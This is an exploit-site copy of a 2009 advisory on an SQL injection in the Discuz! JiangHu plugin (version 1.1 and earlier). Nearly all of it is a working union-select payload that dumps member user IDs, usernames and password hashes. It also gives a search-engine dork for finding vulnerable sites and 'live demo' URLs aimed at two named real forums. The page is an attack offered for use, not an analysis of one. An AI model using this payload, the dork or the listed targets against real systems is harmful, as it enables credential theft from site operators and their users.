Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009090017

Below is a copy:

=========================================================
Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================                   

 [+] Founded : ZhaoHuAn     
 [+] Contact: ZhengXing[at]shandagames[dot]com         
 [+] Blog: http://www.patching.net/zhaohuan/         
 [+] Date: Feb, 9th 2009 
 [+] Update: Sep, 1th 2009
 
========================[Soft Info]====================== 
 
Software: Discuz! Plugin JiangHu Inn         
Version: 1.1                 
Vendor: http://www.discuz.com
d0rk    : inurl:forummission.php              



[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.